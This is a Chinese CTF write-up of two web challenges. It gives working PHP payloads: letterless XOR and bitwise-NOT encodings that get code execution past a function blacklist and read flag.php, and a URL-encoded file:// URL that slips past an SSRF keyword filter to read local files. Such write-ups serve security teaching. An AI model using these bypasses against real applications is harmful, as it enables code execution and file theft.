第五空间部分WEB题解

一天只签了2题WEB的到，拖了大佬后腿(菜如我),剩下的WEB题看大佬WP慢慢研究再补充。

一、hate-php

源码：

 <?php
error_reporting(0);
if(!isset($_GET['code'])){
    highlight_file(__FILE__);
}else{
    $code = $_GET['code'];
    if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { 
        die('You are too good for me'); 
    }
    $blacklist = get_defined_functions()['internal'];
    foreach ($blacklist as $blackitem) { 
        if (preg_match ('/' . $blackitem . '/im', $code)) { 
            die('You deserve better'); 
        } 
    }
    assert($code);
}

​ 两层WAF，第一层过滤preg_match中的关键字，第二层get_defined_functions()['internal']讲PHP内置函数设置成黑名单，也就是PHP自带的可以直接使用的内置函数被BAN了。WAF过后就是assert执行命令。

​ 考虑无字母webshell。

​ 先用之前比赛的一个payload尝试一下能不能执行phpinfo():

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

​ 成功执行，然后尝试执行其他命令。但是由于过滤了; _ ' |等特殊字符，构造一句话然后连马有点麻烦，所以直接用纯取反或异或方法。这里选择的是取反。

同样成功执行phpinfo()

​ 接下来就是找flag文件然后读取

• 列目录

构造var_dump(scandir(current(localeconv)))来列出当前目录的文件（localeconv()返回一个包含本地数字及货币格式信息的数组，所以current(localeconv())永远都是个点）

嵌套在一起后：

1. var_dump(scandir()) : (~(%89%9E%8D%A0%9B%8A%92%8F))((~(%8C%9C%9E%91%9B%96%8D))())

2. var_dump(scandir(current())) : (~(%89%9E%8D%A0%9B%8A%92%8F))((~(%8C%9C%9E%91%9B%96%8D))((~(%9C%8A%8D%8D%9A%91%8B))()))

3. var_dump(scandir(current(localeconv()))) : (~(%89%9E%8D%A0%9B%8A%92%8F))((~(%8C%9C%9E%91%9B%96%8D))((~(%9C%8A%8D%8D%9A%91%8B))((~(%93%90%9C%9E%93%9A%9C%90%91%89))())))

执行结果如下：

当前目录下有flag.php

• 读flag.php

  构造highlight_file(flag.php)

  

  

二、do you know

源码：

<?php
highlight_file(__FILE__);
#本题无法访问外网
#这题真没有其他文件，请不要再开目录扫描器了，有的文件我都在注释里面告诉你们了
#各位大佬...这题都没有数据库的存在...麻烦不要用工具扫我了好不好
#there is xxe.php
$poc=$_SERVER['QUERY_STRING'];
if(preg_match("/log|flag|hist|dict|etc|file|write/i" ,$poc)){
                die("no hacker");
        }
$ids=explode('&',$poc);
$a_key=explode('=',$ids[0])[0];
$b_key=explode('=',$ids[1])[0];
$a_value=explode('=',$ids[0])[1];
$b_value=explode('=',$ids[1])[1];

if(!$a_key||!$b_key||!$a_value||!$b_value)
{
        die('我什么都没有~');
}
if($a_key==$b_key)
{
    die("trick");
}

if($a_value!==$b_value)
{
        if(count($_GET)!=1)
        {
                die('be it so');
        }
}
foreach($_GET as $key=>$value)
{
        $url=$value;
}

$ch = curl_init();
    if ($type != 'file') {
        #add_debug_log($param, 'post_data');
        // 设置超时
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    } else {
        // 设置超时
        curl_setopt($ch, CURLOPT_TIMEOUT, 180);
    }

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

    // 设置header
    if ($type == 'file') {
        $header[] = "content-type: multipart/form-data; charset=UTF-8";
        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    } elseif ($type == 'xml') {
        curl_setopt($ch, CURLOPT_HEADER, false);
    } elseif ($has_json) {
        $header[] = "content-type: application/json; charset=UTF-8";
        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    }

    // curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)');
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_AUTOREFERER, 1);
    // dump($param);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $param);
    // 要求结果为字符串且输出到屏幕上
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // 使用证书：cert 与 key 分别属于两个.pem文件


    $res = curl_exec($ch);
    var_dump($res);

​ 传入任意两个参数，经过WAF判断有无/log|flag|hist|dict|etc|file|write/i后分别取他们的key和value值，绕过2个if判断只需get传入2个键值key不等，值value相等的参数即可。最后将value赋值给url变量，然后读取文件并打印出来。

​ 绕过黑名单只需将协议内容全URL编码，然后curl_exec()带出结果。

file:///var/www/html/flag.php : %66%69%6C%65%3A%2F%2F%2F%76%61%72%2F%77%77%77%2F%68%74%6D%6C%2F%66%6C%61%67%2E%70%68%70

传入任意2个Get参数，值等于上述编码结果。

?key1=编码内容&key2=编码内容

—–待补充—–